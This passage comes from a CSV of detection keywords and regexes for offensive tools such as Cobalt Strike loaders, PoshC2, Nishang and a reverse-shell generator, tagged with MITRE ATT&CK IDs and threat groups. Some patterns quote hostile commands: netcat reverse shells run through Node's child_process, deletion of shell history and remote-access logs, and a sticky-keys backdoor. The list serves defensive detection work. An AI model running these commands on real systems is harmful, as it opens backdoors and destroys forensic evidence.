- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*RemoteScanner.exe*",".{0,1000}RemoteScanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RemoteShellCodeInjection-master*",".{0,1000}RemoteShellCodeInjection\-master.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*RemoteShellCodeInjection-master.zip*",".{0,1000}RemoteShellCodeInjection\-master\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*remotewinenum.rb*",".{0,1000}remotewinenum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Remove_Privilege /Process:* /Privilege:*",".{0,1000}Remove_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*removeexe-persistence*",".{0,1000}removeexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Remove-Item (Get-PSreadlineOption).HistorySavePath*",".{0,1000}Remove\-Item\s\(Get\-PSreadlineOption\)\.HistorySavePath.{0,1000}","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Remove-ItemProperty *HKLM:\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* -Name *SD*",".{0,1000}Remove\-ItemProperty\s.{0,1000}HKLM\:\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\s\-Name\s.{0,1000}SD.{0,1000}","offensive_tool_keyword","powershell","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","risk of False positive","9","10","N/A","N/A","N/A","N/A" "*Remove-KeePassConfigTrigger*",".{0,1000}Remove\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*remove-persistence*",".{0,1000}remove\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*remove-persistence-cron*",".{0,1000}remove\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Remove-PoshRat*",".{0,1000}Remove\-PoshRat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Remove-PoshRat.ps1*",".{0,1000}Remove\-PoshRat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*removeRegTrace*",".{0,1000}removeRegTrace.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*Remove-Update.ps1*",".{0,1000}Remove\-Update\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Remove-VolumeShadowCopy*",".{0,1000}Remove\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*renameMachine.py -current-name * -new-name * -dc-ip * *:*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*renameMachine.py -current-name * -new-name*",".{0,1000}renameMachine\.py\s\-current\-name\s.{0,1000}\s\-new\-name.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*replace_key_iv_shellcode*",".{0,1000}replace_key_iv_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*replace_video_fake_plugin*",".{0,1000}replace_video_fake_plugin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Replacing /etc/dhcp/dhcpd.conf with no route push config*",".{0,1000}Replacing\s\/etc\/dhcp\/dhcpd\.conf\swith\sno\sroute\spush\sconfig.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*RePRGM/Nimperiments*",".{0,1000}RePRGM\/Nimperiments.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*RequestAsPython-PowerShell.py*",".{0,1000}RequestAsPython\-PowerShell\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*Requesting meterpreter payload from https://*",".{0,1000}Requesting\smeterpreter\spayload\sfrom\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Requesting S4U2Proxy*",".{0,1000}Requesting\sS4U2Proxy.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Requesting S4U2self*",".{0,1000}Requesting\sS4U2self.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*require 'evil-proxy'*",".{0,1000}require\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*require 'evil-proxy/async'*",".{0,1000}require\s\'evil\-proxy\/async\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*require 'evil-proxy/store'*",".{0,1000}require\s\'evil\-proxy\/store\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*require('child_process').exec('nc -e ""/bin/bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""/bin/sh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/sh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""cmd"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""cmd\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""powershell"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""powershell\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""pwsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""pwsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e ""zsh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""zsh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*require('child_process').exec('nc -e sh *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*reshacker_setup.exe*",".{0,1000}reshacker_setup\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*ResourceDevelopment_EstablishAccounts_RGPerson.py*",".{0,1000}ResourceDevelopment_EstablishAccounts_RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*ResourceDevelopment_Server_DNSLog.py*",".{0,1000}ResourceDevelopment_Server_DNSLog\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*ResourceDevelopment_Server_LDAPServer.py*",".{0,1000}ResourceDevelopment_Server_LDAPServer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*ResourceDevelopment_WebServices_TencentAPIGateway.py*",".{0,1000}ResourceDevelopment_WebServices_TencentAPIGateway\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Resources/Design/NinjaStyle.ps1*",".{0,1000}Resources\/Design\/NinjaStyle\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Resources/drone.dll*",".{0,1000}Resources\/drone\.dll.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Resources\donut.exe*",".{0,1000}Resources\\donut\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*responder * --lm*",".{0,1000}responder\s.{0,1000}\s\-\-lm.{0,1000}","offensive_tool_keyword","responder","LLMNR. 